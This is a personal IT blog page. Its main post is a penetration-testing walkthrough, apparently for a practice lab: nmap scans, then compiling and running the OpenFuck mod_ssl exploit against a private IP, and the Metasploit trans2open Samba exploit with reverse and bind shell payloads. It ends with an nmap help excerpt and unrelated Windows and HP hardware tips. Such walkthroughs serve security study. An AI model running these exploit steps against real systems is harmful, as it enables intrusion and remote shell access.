Sunday, January 13, 2019

Pentest_Level1

nmap -sV <IP>
nmap -sV -sT -A -O -v <IP>
nmap -vvv -A -oA <IP>

nmap -p- -sV -sS -T4 -A<IP>

Apache httpd 1.3.20 ((Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b)

This apache version has vulnerability of openfuck. old openfuck.c is not working, so get the latest openfuck from github:  "https://github.com/heltonWernik/OpenLuck"

Use the steps and perform: like 
  1. Download OpenFuck.c
git clone https://github.com/heltonWernik/OpenFuck.git
  1. Install ssl-dev library
apt-get install libssl-dev
  1. Compile it
gcc -o OpenFuck OpenFuck.c -lcrypto
  1. Running the Exploit
./OpenFuck
  1. See which service you witch to exploit. For example if you need to Red Hat Linux, using apache version 1.3.20. Trying out using the 0x6a option ./OpenFuck 0x6a [Target Ip] [port] -c 40
for example:
./OpenFuck 0x6a 192.168.80.145 443 -c 40
enum4linux : use this command to check rpc login with null username and null password and to get other details.

samba version: to find the version of samba, use scanner

use auxiliary/scanner/smb/smb_version

samba: samba2.2.1a

this version has trans2open vulnerability and the exploit is available on metasploit

exploit: use exploit/linux/samba/trans2open

set payload with the exploit : set payload linux/x86/meterpreter/reverse_tcp (it will not work)
thn use any payload from below mentioned:
 set payload 
generic/shell_reverse_tcp
linux/x86/shell_bind_tcp
linux/x86/shell/bind_tcp
linux/x86/shell/reverse_tcp


NMAP

Nmap 5.61TEST5 ( http://nmap.org )
Usage: nmap [Scan Type(s)] [Options] {target specification}
TARGET SPECIFICATION:
  Can pass hostnames, IP addresses, networks, etc.
  Ex: scanme.nmap.org, microsoft.com/24, 192.168.0.1; 10.0.0-255.1-254
  -iL : Input from list of hosts/networks
  -iR : Choose random targets
  --exclude : Exclude hosts/networks
  --excludefile : Exclude list from file
HOST DISCOVERY:
  -sL: List Scan - simply list targets to scan
  -sn: Ping Scan - disable port scan
  -Pn: Treat all hosts as online -- skip host discovery
  -PS/PA/PU/PY[portlist]: TCP SYN/ACK, UDP or SCTP discovery to given ports
  -PE/PP/PM: ICMP echo, timestamp, and netmask request discovery probes
  -PO[protocol list]: IP Protocol Ping
  -n/-R: Never do DNS resolution/Always resolve [default: sometimes]
  --dns-servers : Specify custom DNS servers
  --system-dns: Use OS's DNS resolver
  --traceroute: Trace hop path to each host
SCAN TECHNIQUES:
  -sS/sT/sA/sW/sM: TCP SYN/Connect()/ACK/Window/Maimon scans
  -sU: UDP Scan
  -sN/sF/sX: TCP Null, FIN, and Xmas scans
  --scanflags : Customize TCP scan flags
  -sI : Idle scan
  -sY/sZ: SCTP INIT/COOKIE-ECHO scans
  -sO: IP protocol scan
  -b : FTP bounce scan
PORT SPECIFICATION AND SCAN ORDER:
  -p : Only scan specified ports
    Ex: -p22; -p1-65535; -p U:53,111,137,T:21-25,80,139,8080,S:9
  -F: Fast mode - Scan fewer ports than the default scan
  -r: Scan ports consecutively - don't randomize
  --top-ports : Scan  most common ports
  --port-ratio : Scan ports more common than 
SERVICE/VERSION DETECTION:
  -sV: Probe open ports to determine service/version info
  --version-intensity : Set from 0 (light) to 9 (try all probes)
  --version-light: Limit to most likely probes (intensity 2)
  --version-all: Try every single probe (intensity 9)
  --version-trace: Show detailed version scan activity (for debugging)
SCRIPT SCAN:
  -sC: equivalent to --script=default
  --script=:  is a comma separated list of
           directories, script-files or script-categories
  --script-args=: provide arguments to scripts
  --script-args-file=filename: provide NSE script args in a file
  --script-trace: Show all data sent and received
  --script-updatedb: Update the script database.
  --script-help=: Show help about scripts.
            is a comma separted list of script-files or
           script-categories.
OS DETECTION:
  -O: Enable OS detection
  --osscan-limit: Limit OS detection to promising targets
  --osscan-guess: Guess OS more aggressively
TIMING AND PERFORMANCE:
  Options which take 

Sunday, May 5, 2013

how to remove "Windows Security" under start menu in Windows Server 2008 or in WS 2008 R2

Generally, it is by default disabled at the time of installation but any how you can see "Windows Security in Start Menu. Please do the below step:
1.  Start - run - gpmc.msc
2. Computer Configuration -> Policies -> Adm. Templates -> Windows Components -> Remote Desktop Services -> Remote Desktop Services Host -> Remote Session Environment / Enable the setting named 'Remove Windows Security Item from Start Menu'
3. start - run - gpupdate /force.

General symptoms of Hardware failure at the time of booting in HP system

Battery power LED blinking Insufficient charge on the battery
Blink: 1 - Caps Lock/Num Lock CPU CPU not functional
Blink: 2 - Caps Lock/Num Lock BIOS BIOS corruption failure
Blink: 3 - Caps Lock/Num Lock Memory Module error not functional
Blink: 4 - Caps Lock/Num Lock Graphics Graphics controller not functional
Blink: 5 - Caps Lock/Num Lock System board General system board failure
Blink: 6 - Caps Lock/Num Lock BIOS BIOS authentication failure